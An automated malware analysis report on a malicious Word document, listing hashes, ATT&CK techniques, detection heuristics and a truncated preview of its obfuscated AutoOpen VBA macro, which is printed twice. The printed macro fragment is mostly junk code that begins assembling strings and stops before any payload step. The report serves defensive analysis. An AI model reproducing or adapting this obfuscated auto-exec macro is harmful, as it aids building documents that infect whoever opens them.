Office (OLE) malware analysis — malicious · 4be12b95ec824cdf

MALICIOUS

Office (OLE)

297.0 KB Created: 2018-04-25 21:21:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 409483a1baf1100a9bf7b8f2b16c16c2 SHA-1: 3a69ee977a835e22c69e80837fdfa109f9777f07 SHA-256: 4be12b95ec824cdf52fc3823a1b87dad1e1c0fe3b3a7efd59e7785aae87cb975

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and configured to execute, indicating an attempt to run malicious code upon opening. The presence of 'GetObject' and 'PCODE_AUTOEXEC_EXEC' heuristics further confirms the execution of VBA code. While the exact payload is not discernible due to obfuscation, the macro's structure suggests it is designed to download and execute a secondary stage.

Heuristics 7

ClamAV: Doc.Malware.Generic-6666852-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6666852-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 59568 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	59568 bytes
SHA-256: `d9b1e93bacd83d5acb453311d5c4af8bba6074dad4c76611114d393f3b0b861b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub POGiseLUtoJyvEwoze() iOhuXYToDIVe = Val("14204.9") & "zYjoveieGaQ" Dim DyPuWifYkEWuviRUiava For DyPuWifYkEWuviRUiava = 3 To 11 Dim rADAnYLAzHuNegubYHuXAdY rADAnYLAzHuNegubYHuXAdY = Fix(77563) Next Dim VOHoBuKuHAwyB VOHoBuKuHAwyB = Rnd(116) If VOHoBuKuHAwyB > 70637 Then HoWEKutbiSOdO = 37589 VOHoBuKuHAwyB = Exp(6) End If Dim QIMAqoQiGlE For QIMAqoQiGlE = 4 To 10 Dim REPanafUVaXi REPanafUVaXi = Fix(72077) Next vizUlyziwOSOnEtykUk = 60841 End Sub Sub AutoOpen() niTyjukaRYxiTEMEgOBiUdo = Val("78120.2") & "gYgEvUdAfURowEXAWevYWEk" On Error Resume Next Dim huNQOsiVezYf huNQOsiVezYf = Rnd(111) If huNQOsiVezYf > 34670 Then huNQOsiVezYf = Exp(1) End If Debug.Print "kYgaXIFigYne" cUMwOxEHUsAlDeKi = 13416 Debug.Print "gATywuDIaiQOt" Dim lISIPAnOWiRFoROPuReD For lISIPAnOWiRFoROPuReD = 7 To 11 Dim aIxYdiZihefapI aIxYdiZihefapI = Fix(42481) Next DybUXUloZyvUvaDEQimiWe = Val("27819.3") & "wYgozeioHAm" Dim DiZUqoiIDuSOlUbYQORIlO For DiZUqoiIDuSOlUbYQORIlO = 5 To 13 Dim viCafeRevtAkAgIfIXIs viCafeRevtAkAgIfIXIs = Fix(36329) Next XykAZuGErEPYZeLiJeWOrYU = "" kEWonIXUcibAXAk = 51440 RehiGeLomyfABAM = InStr("fIqAjoiukazatusAaY", "fIqAjoiukazatusAaYfIqAjoiukazatusAaY") pUBecIbonatiYLyPu = Val("63384.7") & "GyfaaAWoFoToMErA" BIjUWevEjYQyNOPyTIsyHAtI = InStr("nYrvovduKyjiLu", "nYrvovduKyjiLunYrvovduKyjiLu") Dim rExEWeQUxave rExEWeQUxave = Rnd(124) If rExEWeQUxave > 15844 Then Dim KoqyNVOkAmOSoqeVahojiz For KoqyNVOkAmOSoqeVahojiz = 3 To 11 Dim HyaFAfexuVuh HyaFAfexuVuh = Fix(14483) Next Dim XewmhUXeXIvIh XewmhUXeXIvIh = Log(2) XewmhUXeXIvIh = XewmhUXeXIvIh + Log(12) rExEWeQUxave = Exp(4) End If Debug.Print "wuJAVEPILIokaK" Dim ROxeLOXYPyWYdypSB ROxeLOXYPyWYdypSB = Rnd(135) If ROxeLOXYPyWYdypSB > 38244 Then ROxeLOXYPyWYdypSB = Exp(5) End If ieZAgoXApIPET = Val("53166.9") & "aOgEQIkYSeJAxiCY" Dim GuviSekALuj FArIfeuZAkUPojuTaT = 4359 lIaEjiSUhIDIVYS = 79151 For GuviSekALuj = 4 To 10 Dim ZOqAGuJISInygIROtySUnul ZOqAGuJISInygIROtySUnul = Fix(60520) Dim luToVaGEaipyfOWufISiiYCE For luToVaGEaipyfOWufISiiYCE = 4 To 13 Dim GAzifasMeweNUhIdibEGYBe GAzifasMeweNUhIdibEGYBe = Fix(19354) Next Debug.Print "cYVEwUJYTOKeRAbex" Next neRASYPANOZaR = Val("57216.10") & "vErOpiBelyHUODixyz" Debug.Print "lOiaIFAMakiXoQIfA" XykAZuGErEPYZeLiJeWOrYU = XykAZuGErEPYZeLiJeWOrYU + IIf((46 + 92) = 138, "sc", "byj") QEcgEPIziaaGe = Val("737.10") & "kUcoctaSAiONUGRyn" Dim SaloHopODyyreXIRu VasUSyMihEkGAQEm = InStr("aawobEJujUK", "aawobEJujUKaawobEJujUK") For SaloHopODyyreXIRu = 7 To 10 uLAsFotAX = Val("56355.2") & "WiFhUGequXaxAkYsEbs" Debug.Print "LAfUbObWODExiTipitykiB" Dim loMyXOgeNoLeVAteVuZYgEC SgiMyCYPAPeNeGwICuTIFi = 36795 loMyXOgeNoLeVAteVuZYgEC = Fix(41722) Debug.Print "fEdOcOcvimYgyieluiAO" FaiQikUWAqUf = InStr("liPoqApAZyJEQUm", "liPoqApAZyJEQUmliPoqApAZyJEQUm") Next Dim agigIgYjObExUnI For agigIgYjObExUnI = 7 To 10 Dim nExAPUPqEROnULU nExAPUPqEROnULU = Fix(51529) Next DYQeVEqaZoSYQOs = 25807 Dim JegOLuCenqojUtyNYG JegOLuCenqojUtyNYG = Log(8) Dim ZEqyBoJOXUaIgeRuaEv ZEqyBoJOXUaIgeRuaEv = Rnd(117) If ZEqyBoJOXUaIgeRuaEv > 18630 Then ZEqyBoJOXUaIgeRuaEv = Exp(7) End If Dim BwEGaZpAdOqihokUSeNA BwEGaZpAdOqihokUSeNA = Rnd(123) If BwEGaZpAdOqihokUSeNA > 65091 Then BwEGaZpAdOqihokUSeNA = Exp(3) End If JegOLuCenqojUtyNYG = JegOLuCenqojUtyNYG + Log(11) qOfiSAxoWYqAVO = InStr("sImycuRyfELUGESihuv", "sImycuRyfELUGESihuvsImycuRyfELUGESihuv") XykAZuGErEPYZeLiJeWOrYU = XykAZuGErEPYZeLiJeWOrYU + IIf((177 + 354) = 531, "ri", "Khx") Dim kujuWeJitoiEV Dim QogEvaBOcIzaniZerudE QogEvaBOcIzaniZerudE = Log(9) QogEvaBOcIzaniZerudE = QogEvaBOcIzaniZerudE + Log(10) kujuWeJitoiEV = Log(1) ... (truncated)

SHA-256: d9b1e93bacd83d5acb453311d5c4af8bba6074dad4c76611114d393f3b0b861b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub POGiseLUtoJyvEwoze()


iOhuXYToDIVe = Val("14204.9") & "zYjoveieGaQ"
Dim DyPuWifYkEWuviRUiava
For DyPuWifYkEWuviRUiava = 3 To 11
   Dim rADAnYLAzHuNegubYHuXAdY
   rADAnYLAzHuNegubYHuXAdY = Fix(77563)
Next
Dim VOHoBuKuHAwyB
VOHoBuKuHAwyB = Rnd(116)
If VOHoBuKuHAwyB > 70637 Then
HoWEKutbiSOdO = 37589
   VOHoBuKuHAwyB = Exp(6)
End If
Dim QIMAqoQiGlE
For QIMAqoQiGlE = 4 To 10
   Dim REPanafUVaXi
   REPanafUVaXi = Fix(72077)
Next
vizUlyziwOSOnEtykUk = 60841
End Sub
Sub AutoOpen()
niTyjukaRYxiTEMEgOBiUdo = Val("78120.2") & "gYgEvUdAfURowEXAWevYWEk"
On Error Resume Next
Dim huNQOsiVezYf
huNQOsiVezYf = Rnd(111)
If huNQOsiVezYf > 34670 Then
   huNQOsiVezYf = Exp(1)
End If
Debug.Print "kYgaXIFigYne"
cUMwOxEHUsAlDeKi = 13416
Debug.Print "gATywuDIaiQOt"
Dim lISIPAnOWiRFoROPuReD
For lISIPAnOWiRFoROPuReD = 7 To 11
   Dim aIxYdiZihefapI
   aIxYdiZihefapI = Fix(42481)
Next

DybUXUloZyvUvaDEQimiWe = Val("27819.3") & "wYgozeioHAm"

Dim DiZUqoiIDuSOlUbYQORIlO
For DiZUqoiIDuSOlUbYQORIlO = 5 To 13
   Dim viCafeRevtAkAgIfIXIs
   viCafeRevtAkAgIfIXIs = Fix(36329)
Next
XykAZuGErEPYZeLiJeWOrYU = ""
kEWonIXUcibAXAk = 51440
RehiGeLomyfABAM = InStr("fIqAjoiukazatusAaY", "fIqAjoiukazatusAaYfIqAjoiukazatusAaY")

pUBecIbonatiYLyPu = Val("63384.7") & "GyfaaAWoFoToMErA"
BIjUWevEjYQyNOPyTIsyHAtI = InStr("nYrvovduKyjiLu", "nYrvovduKyjiLunYrvovduKyjiLu")
Dim rExEWeQUxave
rExEWeQUxave = Rnd(124)
If rExEWeQUxave > 15844 Then
Dim KoqyNVOkAmOSoqeVahojiz
For KoqyNVOkAmOSoqeVahojiz = 3 To 11
   Dim HyaFAfexuVuh
   HyaFAfexuVuh = Fix(14483)
Next
Dim XewmhUXeXIvIh
XewmhUXeXIvIh = Log(2)

XewmhUXeXIvIh = XewmhUXeXIvIh + Log(12)
   rExEWeQUxave = Exp(4)
End If
Debug.Print "wuJAVEPILIokaK"
Dim ROxeLOXYPyWYdypSB
ROxeLOXYPyWYdypSB = Rnd(135)
If ROxeLOXYPyWYdypSB > 38244 Then
   ROxeLOXYPyWYdypSB = Exp(5)
End If
ieZAgoXApIPET = Val("53166.9") & "aOgEQIkYSeJAxiCY"

Dim GuviSekALuj
FArIfeuZAkUPojuTaT = 4359
lIaEjiSUhIDIVYS = 79151
For GuviSekALuj = 4 To 10
   Dim ZOqAGuJISInygIROtySUnul
   ZOqAGuJISInygIROtySUnul = Fix(60520)
Dim luToVaGEaipyfOWufISiiYCE
For luToVaGEaipyfOWufISiiYCE = 4 To 13
   Dim GAzifasMeweNUhIdibEGYBe
   GAzifasMeweNUhIdibEGYBe = Fix(19354)
Next
Debug.Print "cYVEwUJYTOKeRAbex"
Next
neRASYPANOZaR = Val("57216.10") & "vErOpiBelyHUODixyz"
Debug.Print "lOiaIFAMakiXoQIfA"
 XykAZuGErEPYZeLiJeWOrYU = XykAZuGErEPYZeLiJeWOrYU + IIf((46 + 92) = 138, "sc", "byj")
QEcgEPIziaaGe = Val("737.10") & "kUcoctaSAiONUGRyn"
Dim SaloHopODyyreXIRu
VasUSyMihEkGAQEm = InStr("aawobEJujUK", "aawobEJujUKaawobEJujUK")
For SaloHopODyyreXIRu = 7 To 10
uLAsFotAX = Val("56355.2") & "WiFhUGequXaxAkYsEbs"
Debug.Print "LAfUbObWODExiTipitykiB"
   Dim loMyXOgeNoLeVAteVuZYgEC
SgiMyCYPAPeNeGwICuTIFi = 36795
   loMyXOgeNoLeVAteVuZYgEC = Fix(41722)
Debug.Print "fEdOcOcvimYgyieluiAO"
FaiQikUWAqUf = InStr("liPoqApAZyJEQUm", "liPoqApAZyJEQUmliPoqApAZyJEQUm")
Next
Dim agigIgYjObExUnI
For agigIgYjObExUnI = 7 To 10
   Dim nExAPUPqEROnULU
   nExAPUPqEROnULU = Fix(51529)
Next
DYQeVEqaZoSYQOs = 25807
Dim JegOLuCenqojUtyNYG
JegOLuCenqojUtyNYG = Log(8)

Dim ZEqyBoJOXUaIgeRuaEv
ZEqyBoJOXUaIgeRuaEv = Rnd(117)
If ZEqyBoJOXUaIgeRuaEv > 18630 Then
   ZEqyBoJOXUaIgeRuaEv = Exp(7)
End If
Dim BwEGaZpAdOqihokUSeNA
BwEGaZpAdOqihokUSeNA = Rnd(123)
If BwEGaZpAdOqihokUSeNA > 65091 Then
   BwEGaZpAdOqihokUSeNA = Exp(3)
End If
JegOLuCenqojUtyNYG = JegOLuCenqojUtyNYG + Log(11)
qOfiSAxoWYqAVO = InStr("sImycuRyfELUGESihuv", "sImycuRyfELUGESihuvsImycuRyfELUGESihuv")

XykAZuGErEPYZeLiJeWOrYU = XykAZuGErEPYZeLiJeWOrYU + IIf((177 + 354) = 531, "ri", "Khx")
Dim kujuWeJitoiEV
Dim QogEvaBOcIzaniZerudE
QogEvaBOcIzaniZerudE = Log(9)

QogEvaBOcIzaniZerudE = QogEvaBOcIzaniZerudE + Log(10)
kujuWeJitoiEV = Log(1)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.